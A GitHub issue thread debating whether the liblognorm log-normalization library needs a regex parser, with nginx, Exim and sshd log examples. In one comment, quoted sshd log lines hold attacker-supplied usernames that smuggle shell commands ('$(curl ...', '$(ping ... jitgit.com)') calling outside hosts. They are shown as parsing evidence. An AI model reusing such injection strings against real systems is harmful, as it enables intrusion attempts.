rsyslog / liblognorm

a fast samples-based log normalization library
http://www.liblognorm.com
GNU Lesser General Public License v2.1

Do we need a "regex" parser? #143

Open rgerhards opened 9 years ago

rgerhards commented 9 years ago

some late versions of liblognorm v1 had a regex parser, but it was disabled by default and users were strongly advised not to activate it due to bad performance. Also, there is the general fear that the availability of "regex" makes users use it, simply because this is something they know well. Given that the whole point of liblognorm is to gain speed by avoiding regex processing, this sounds like a very bad thing. Note that we avoid regex because all the major implementations have very bad runtime, often exponential (PCRE is a "good" example here).
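A minimal sketch of the exponential-runtime problem, using illustrative patterns (not liblognorm code): a nested quantifier forces a backtracking engine such as Python's `re` or PCRE to explore exponentially many ways to split the input when the overall match fails.

```python
import re

# (a+)+ and a+ accept the same strings, but the nested quantifier is
# ambiguous: on a near-miss input the engine backtracks through every
# possible grouping of the 'a's before giving up.
pathological = re.compile(r'^(a+)+$')
linear = re.compile(r'^a+$')

# Both accept the same language ...
assert pathological.match('aaaa') is not None
assert linear.match('aaaa') is not None

# ... but on an input like 'a' * 30 + 'b', the nested pattern takes on the
# order of 2^30 backtracking steps, while a+ fails in linear time.
# (The pathological case is deliberately not executed here; try it with a
# timeout to see the difference.)
assert linear.match('a' * 30 + 'b') is None
```

Linear-time engines avoid this by construction, which is what makes an O(n) regex parser at least conceivable for liblognorm.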

In v1, I accepted the regex parser because there were some border cases which were hard to process otherwise. With the much-increased capabilities of v2, I see an even lower need for regex processing. So it is currently not supported in v2.

If you have real trouble without regex, please post your use case here (no theoretical thoughts, please, I would like to see where it really hurts!). This can lead to changes in liblognorm or maybe to the re-introduction of a regex feature. In the latter case, we may go for some of those small libraries that actually are O(n), with n being the max message size -- a complexity that can be easily achieved for regex if regex processing is not abused.

janmejay commented 8 years ago

Logging frameworks that allow context-building (like picking variables from thread-context or manually created logging-context etc) often generate logs that have a lot of fields that can be easily parsed, along with a free-form fragment which can have arbitrary content (content comes from many places in the application, or is generated by an external service call, etc.). I have come across a handful of such cases (from different users, of course).

In such cases, the free-form portion is perfectly human readable (which is why it was coded up that way), but not easy to handle without regex while parsing.

For instance, consider this rule:

rule=:"%client_ip:char-to:"%" %tcp_peer_ip:ipv4% - [%req_time:char-to:]%] "%verb:word% %url:word% %protocol:char-to:"%" %status:interpret:int:number% %latency:interpret:float:word% %bytes_sent:interpret:int:number% "%referrer:char-to:"%" "%user_agent:char-to:"%" %upstream_addrs:tokenized:, :tokenized: \x3a :regex:[^ ,]+% %upstream_responsetimes:tokenized:, :tokenized: \x3a :interpret:float:regex:[^ ,]+% %pipe:word% \t %host:word% cache%cache:word%

Nginx generates multiple upstream_addr and upstream_status separated by comma and colon. Regex provides a clean way to handle it.
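As a rough sketch of what the nested tokenized parsers in the rule above do: nginx's $upstream_addr can list several upstreams separated by ", ", with ":" between address and port (the \x3a in the rule). A plain two-level split handles this without regex. The sample value below is illustrative, not taken from a real log:

```python
# Hypothetical $upstream_addr value: comma-separated upstream entries,
# each of the form "address:port".
upstream_addrs = "192.168.0.10:8080, 192.168.0.11:8080"

# Equivalent of the nested tokenized parsers: split on ", ", then on ":".
entries = [entry.split(":") for entry in upstream_addrs.split(", ")]
assert entries == [["192.168.0.10", "8080"], ["192.168.0.11", "8080"]]
```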

Also, it allows a large set of unforeseen cases to be handled at the user's level without being blocked on code changes. It allows the user to be unblocked immediately and, if the use case is important enough, to bring it to our notice (or create a PR). Once it's supported first-class, the regex call can be replaced.

rgerhards commented 8 years ago

Can you post a sample log line that matches the rule?

I am very concerned that once we add regex support, users will begin to use it simply because they know regex. That would make liblognorm just another dull, low-performance solution. I think we should try to do better.

rgerhards commented 8 years ago

I should stress that I am really after the actual samples rather than theoretical thoughts. I know that there are different schools of thinking and I would like to see where we are really hurt in practice without regex.

davidelang commented 8 years ago

take a look at the liblognorm v2 capabilities (repeated, custom types, alternates). I think they provide a much more direct way to address this.

we still need a more generic name-value capability in v2 (where we can define the name limits, and the two separator types)

David Lang

rgerhards commented 8 years ago

the current discussion around different date formats might show a valid argument pro regex support. I can't provide more details at this moment, but I thought I should at least add the information to this tracker.

davidelang commented 8 years ago

full regex support wouldn't solve the date parsing problem. It would make it easier to extract the various components, but not to assemble the components into a timestamp result.

However, the grok compatibility module is a regex engine, so it may address the request.

There are some regex engines that are far more efficient than the standard ones when dealing with large bodies of rules (IIRC Google released one, RE2, that turns the pile of regex lines into a single parse tree)

cbay commented 7 years ago

Exim log lines look like this:

2002-10-31 08:57:53 16ZCW1-0005MB-00 <= kryten@dwarf.fict.example H=mailer.fict.example [192.168.123.123] U=exim P=smtp S=5678 id=123456789

The first few fields are fixed, but then Exim adds a variable number of additional fields, prefixed by 'X=' where X is the field name. There are 24 possible additional fields. Exim puts them in a fixed order (H will always come before U, which comes before P, etc.), but each log line may include any subset of them. So, for instance, you can have these log lines:

2002-10-31 08:57:53 16ZCW1-0005MB-00 <= kryten@dwarf.fict.example H=mailer.fict.example [192.168.123.123] P=smtp X=TLS1.0:ECDHE_RSA_AES_256_CBC_SHA1:256 CV=no A=login:foo@example.com S=5678 id=123456789
2002-10-31 08:57:53 16ZCW1-0005MB-00 <= kryten@dwarf.fict.example H=mailer.fict.example [192.168.123.123] U=exim P=smtp S=5678 T="subject line" id=123456789

This can be easily parsed with a regex having optional items, such as (I've only included a few fields, not the 24 of them):

(?P<id>\S+) (?P<direction>\S+) (?P<email>\S+)( F=<(?P<f>\S+)>)?( R=(?P<r>\S+))?( T=(?P<t>\S+))?( S=(?P<s>\S+))?( H=(?P<h>\S+ \[\S+\]))?( X=(?P<x>\S+))?( CV=(?P<cv>\S+))?( C="(?P<c>.+)")?( QT=(?P<qt>\S+))?( DT=(?P<dt>\S+))?

Unless I've missed something, there's no way to parse such log lines with liblognorm (well, unless you have a rule for each possible combination of fields, which is pretty much impossible).
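One non-regex alternative for this shape of log is a token scan over the trailing "X=value" fields, which sidesteps the 2^24 combinations entirely. A sketch (the sample line is adapted from the examples above, without the date prefix; quoted values containing spaces, such as T="subject line", would need a smarter tokenizer):

```python
# Scan the variable trailing "X=value" fields token by token instead of
# writing one big regex with 24 optional groups.
line = ('16ZCW1-0005MB-00 <= kryten@dwarf.fict.example '
        'H=mailer.fict.example [192.168.123.123] U=exim P=smtp S=5678')

tokens = line.split()
record = {'id': tokens[0], 'direction': tokens[1], 'email': tokens[2]}
i = 3
while i < len(tokens):
    tok = tokens[i]
    if '=' in tok:
        key, _, value = tok.partition('=')
        # H= is followed by a bracketed address: "H=host [ip]"
        if key == 'H' and i + 1 < len(tokens) and tokens[i + 1].startswith('['):
            value += ' ' + tokens[i + 1]
            i += 1
        record[key] = value
    i += 1

assert record['U'] == 'exim'
assert record['H'] == 'mailer.fict.example [192.168.123.123]'
```

This is essentially what a generic name-value parser would do internally; the fixed field order never has to be spelled out.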

davidelang commented 7 years ago

look for the repeat parser

There is a regex parser available, but it is cripplingly slow by comparison

listing each combination is actually nice and fast with liblognorm; it doesn't impose a massive slowdown the way multiple regex rules do

cbay commented 7 years ago

Listing each combination is just not possible. There are 24 optional fields, so even with the fixed ordering there are up to 2^24 (about 16.8 million) possible combinations.

jbyers-suse commented 6 years ago

It seems as though the string parser might need a "lazy" matching mode to parse strings formed from a random mix of uppercase and lowercase characters and digits, along with a special symbol (such as an underscore) in the middle of the string. I understand that you could use regex to parse such a custom string too.

In lazy mode, the parser always matches if at least one character can be matched. This can lead to unexpected results, so use it with care.

Could someone explain why it might cause "unexpected" results? Thank you.

candlerb commented 5 years ago

As far as I can tell, liblognorm doesn't support a zero-or-one match, like (?:abc)? in regex. That's the main issue with the exim example.

It could be done with alternates if an empty alternate were allowed. This might end up with more backtracking though: in the DAG, even if you give preference to the "match" branch, you may end up at a dead end and have to return to retry via the "empty" branch. In practice I don't think this would be an issue, e.g. exim logs have already been matched as exim by this point.

davidelang commented 5 years ago

see https://www.researchgate.net/publication/310545144_Efficient_Normalization_of_IT_Log_Messages_under_Realtime_Conditions

regex performance is really poor compared to liblognorm

I think we need to enable empty alternates, but you can work around this by including another item in the alternate (for example ': " vs " " if you want to allow the : to be optional)

David Lang

cybersecuritypoet commented 3 years ago

I see that the issue is pretty much dead, but I would like to add a comment for reference.

Logs requiring regex: An example of logs that I believe cannot be parsed by liblognorm without regex are SSHD logs where the username is not a single word. This is clearly a mistake or an exploitation attempt; nevertheless, I cannot parse those logs. The part in bold is the username. The parsing of the username should stop at encountering "%ip:ipv4% port %port:number% [preauth]" (simplifying it here for the sake of readability), which is not how liblognorm works as far as I understand. This is where, while far from an ideal solution, a regex parser would work. Alternatively, liblognorm would have to support a parser like "match-to", matching everything until a match, defined as a liblognorm parser, is found. Example: _match-to{"parser":"%ip:ipv4% port %port:number% [preauth]%.:end_ofline%"}, assuming that an _end_ofline "parser" is available.

Examples:

Connection closed by invalid user **$(curl 116.203.26.222** 1.1.1.1 port 60598 [preauth]
Connection closed by invalid user **$(ping -c 1 95.217.6.177.jitgit.com)** 1.1.1.1 port 57214 [preauth]
Disconnected from invalid user **95.216.157.84 - SSH-2.0-Ope.SSH_8.2p1 Ubuntu-4ubuntu0.1\\\\r** 1.1.1.1 port 34908 [preauth]
Disconnected from invalid user **95.217.143.212 - SSH-2.0-Ope.SSH_7.4p1 Debian-10+deb9u1** 1.1.1.1 port 40250 [preauth]
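For this specific shape of line, the proposed "match-to" behavior can also be approximated without regex by anchoring from the right: the trailing "IP port PORT [preauth]" is fixed, so splitting off the last four tokens recovers the free-form username intact. A sketch (the helper name is made up, and the bold markers from the examples above are omitted):

```python
def parse_preauth(line):
    """Split off the fixed 'IP port PORT [preauth]' tail, keeping the
    free-form username intact even if it contains spaces."""
    prefix, ip, kw, port, tail = line.rsplit(' ', 4)
    assert kw == 'port' and tail == '[preauth]'
    for marker in ('closed by invalid user ', 'from invalid user '):
        head, sep, user = prefix.partition(marker)
        if sep:
            return user, ip, int(port)
    return None

user, ip, port = parse_preauth(
    'Connection closed by invalid user $(curl 116.203.26.222 '
    '1.1.1.1 port 60598 [preauth]')
assert user == '$(curl 116.203.26.222'
assert ip == '1.1.1.1' and port == 60598
```

This only works because the tail is rigid; a genuine match-to parser would generalize the same idea to any liblognorm-parseable suffix.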

Empty alternative match: Empty alternatives would also help in reducing the rulebase size, as the username in sshd logs can apparently be an empty string. The result should be the variable containing an empty string, though, not omitting the variable, as having an empty string still provides information.

Examples:

Failed password for invalid user some_user from 1.1.1.1 port 39202 ssh2
Failed password for invalid user  from 1.1.1.1 port 41923 ssh2
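In regex terms this is exactly the empty-match case: with both ends anchored, the username capture can match the empty string and still appear in the result (as ''), rather than being omitted. A sketch against the two example lines above:

```python
import re

# Both the head ("Failed password for invalid user ") and the tail
# (" from IP port N ssh2") are fixed, so the capture in between may be empty.
pat = re.compile(
    r'^Failed password for invalid user (?P<user>.*) from '
    r'(?P<ip>\S+) port (?P<port>\d+) ssh2$')

m = pat.match('Failed password for invalid user some_user '
              'from 1.1.1.1 port 39202 ssh2')
assert m.group('user') == 'some_user'

# Note the double space in the log line: the username is the empty string,
# yet the capture group is still present.
m = pat.match('Failed password for invalid user  from 1.1.1.1 port 41923 ssh2')
assert m.group('user') == ''
```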
davidelang commented 3 years ago

why can't you use string-to, matching ' from ' in this case?

David Lang

cybersecuritypoet commented 3 years ago

Would string-to match an empty string? The description suggests that it wouldn't: "One or more characters, up to the next string given in 'extradata'."

Also, because the username can be pretty much anything, it might contain the string ' from '. The solution you are proposing might cover the vast majority of username cases, but it is not a 100% precise parser. There are a number of edge cases that won't be covered, and at the moment nothing can be done about that, as far as I understand.

davidelang commented 3 years ago

no, it will not match an empty string.

But if you know the field that appears next, you can match that

so if you have

username=something foo=something

then the rule

rule=:username=%username:string-to: foo=% foo=%foo:rest%

would work
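In Python terms, string-to behaves roughly like a split on the first occurrence of the delimiter string. A sketch with made-up field values, showing both the working case and the failure mode when the name itself contains the delimiter:

```python
# string-to matches up to the *first* occurrence of the delimiter,
# so split(..., 1) models it.
line = 'username=alice foo=bar'
user_part, foo_part = line.split(' foo=', 1)
assert user_part.removeprefix('username=') == 'alice'
assert foo_part == 'bar'

# Adversarial name containing the delimiter: the split cuts too early.
line = 'username=evil foo=x foo=bar'
user_part, rest = line.split(' foo=', 1)
assert user_part.removeprefix('username=') == 'evil'  # should be 'evil foo=x'
```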

This is why freeform fields like username, especially ones where you allow characters like ' and space in them, should be enclosed in double quotes (or some other delimiter that you don't allow in the name)

David Lang


cybersecuritypoet commented 3 years ago

I think there might be some misunderstanding.

Your solution will not work if the username is empty. Your solution will not work as desired (or at all) if the username contains the string ' foo='. Both cases are possible, as the provided logs prove, and they represent two separate problems.

If you have no control over the contents of a field, then my understanding is that there is literally no way you can match that field without regex at this stage. You can, to some degree, work around empty fields by having multiple versions of a rule, but that solves only one problem and is a fairly dirty hack which greatly increases the size of the rulebase.

This is why freeform fields like username, especilly ones where you will allow ' and space in them should be enclosed in double quotes (or some other delimiter that you don't allow in the name)

Sure, that is the best practice, nevertheless, we are discussing a parsing library, which we want to use to deal with particular logs. We can't just say that the solution is to "Fix the logs". There are numerous solutions that log in that fashion. Often it is even impossible to find printable characters that cannot be used in usernames, as a lot of modern systems allow all printable characters to be used. I don't think we can just go to OpenSSH (and all others) and ask them to fix the logs, that are in a specific format, that has been used for years, breaking backward compatibility. It would be great, though.

davidelang commented 3 years ago

you could remove the space at the beginning of ' foo=' and it should match an empty name (at the cost of including a space after every real name, but that can be cleaned up)

it will still break if a name includes foo=, but what names are valid that include = in them?

If you allow anything in a name and don't have a delimiter (and don't escape it), it is going to be impossible to parse reliably no matter what you do (and leads to sql injection vulnerabilities, etc)

David Lang


davidelang commented 3 years ago

On Thu, 15 Jul 2021, cybersecuritypoet wrote:

Sure, that is the best practice, nevertheless, we are discussing a parsing library, which we want to use to deal with particular logs. We can't just say that the solution is to "Fix the logs". There are numerous solutions that log in that fashion. Often it is even impossible to find printable characters that cannot be used in usernames, as a lot of modern systems allow all printable characters to be used. I don't think we can just go to OpenSSH (and all others) and ask them to fix the logs, that are in a specific format, that has been used for years, breaking backward compatibility. It would be great, though.

actually, if you can demonstrate a vulnerability in the logs, you can (they won't like it, but you can). not having any character limits or delimiters/escaping on usernames is a security vulnerability that needs to be closed.

David Lang

cybersecuritypoet commented 3 years ago

If you allow anything in a name and don't have a delimiter (and don't escape it), it is going to be impossible to parse reliably no matter what you do (and leads to sql injection vulnerabilities, etc)

Using regex, with anchoring from the beginning and end, you can at least account for one unknown text inside. Let's assume anchors cannot be "forged" (protections exist to prohibit non-printable characters); then regex allows specifying the way of parsing from the start and from the end, and then throwing everything between them into an extracting group. This solves at least that one use case, which is a huge chunk of cases from my experience. Having regex rules at least partially solves a real-world problem.
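To make the anchoring idea concrete, here is a sketch against one of the log lines quoted earlier (bold markers removed): the fixed head and tail are anchored, and the greedy capture in the middle absorbs arbitrary content, including text that looks like other fields.

```python
import re

# Anchor the fixed head and the fixed tail; the capture in the middle can
# then be anything, even text resembling other fields.
pat = re.compile(
    r'^Disconnected from invalid user (?P<user>.*) '
    r'(?P<ip>\S+) port (?P<port>\d+) \[preauth\]$')

line = ('Disconnected from invalid user 95.217.143.212 - '
        'SSH-2.0-Ope.SSH_7.4p1 Debian-10+deb9u1 1.1.1.1 port 40250 [preauth]')
m = pat.match(line)
assert m.group('user') == '95.217.143.212 - SSH-2.0-Ope.SSH_7.4p1 Debian-10+deb9u1'
assert m.group('ip') == '1.1.1.1'
assert m.group('port') == '40250'
```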

I can protect myself from sql injection vulnerabilities by properly designing the application (prepared statements), or not using SQL at all - Elasticsearch, Splunk, MongoDB, etc. are more likely destinations for logs. There are ways of dealing with input that is not sanitized, and this should not be a limiting factor from the perspective of a parsing library.

Fiddling with removing the space, and other modifications done AFTER the parsing library has done its work, does not change the fact that the library does not provide a way to do that. I am not saying it is impossible to work around; I am saying that the functionality would benefit this particular library.

it will still break if a name includes foo=, but what names are valid that include = in them?

This time it is 'foo=', but that is just one case. Next time it is 'from ', which is much easier to imagine. The possibilities are endless. Look at the username strings that I have provided in the logs. Those are proof enough that this can easily be encountered in the real world: the logs are from an Internet-facing server. I disposed of the other examples, but they were numerous, containing different strings.

**95.216.157.84 - SSH-2.0-Ope.SSH_8.2p1 Ubuntu-4ubuntu0.1\\\\r**
**$(ping -c 1 95.217.6.177.jitgit.com)**

actually, if you can demonstrate a vulnerability in the logs, you can (they won't like it, but you can). not having any character limits or delimiters/escaping on usernames is a security vulnerability that needs to be closed.

That I am not sure of. A character limit might, and probably does, exist from a practical perspective (e.g. maximum packet size), but it doesn't change the problem we are discussing. The logs are not themselves executed, so their contents don't have to be sanitized. As far as I understand, a username is any ISO 10646 UTF-8 constrained text. There is no vulnerability per se. There is an inconvenience for those trying to parse the logs, but that wouldn't be a likely candidate for a quick fix.

https://datatracker.ietf.org/doc/html/rfc4252#section-11:

      byte      SSH_MSG_USERAUTH_REQUEST
      string    user name in ISO-10646 UTF-8 encoding [RFC3629]
      string    service name in US-ASCII
      string    method name in US-ASCII
      ....      method specific fields

https://datatracker.ietf.org/doc/html/rfc4251#section-4.5:

   For the most part, the SSH protocols do not directly pass text that
   would be displayed to the user.  However, there are some places where
   such data might be passed.  When applicable, the character set for
   the data MUST be explicitly specified.  In most places, ISO-10646
   UTF-8 encoding is used [RFC3629].  When applicable, a field is also
   provided for a language tag [RFC3066].
(...)
  The client and server user names are inherently constrained by what
   the server is prepared to accept.  They might, however, occasionally
   be displayed in logs, reports, etc.  They MUST be encoded using ISO
   10646 UTF-8, but other encodings may be required in some cases.  It
   is up to the server to decide how to map user names to accepted user
   names.  Straight bit-wise, binary comparison is RECOMMENDED.

I don't think continuing the discussion on SSH is beneficial to this issue. This is just one example of a broader issue.

I should stress that I am really after the actual samples rather than theoretical thoughts. I know that there are different schools of thinking and I would like to see where we are really hurt in practice without regex.

A couple years ago @rgerhards asked for examples of things that hurt us in real world - I have provided examples from my experience that hurt my use cases. Those might not be convincing enough to change the way this library works, fair enough, but I am convinced that there is merit behind those particular examples.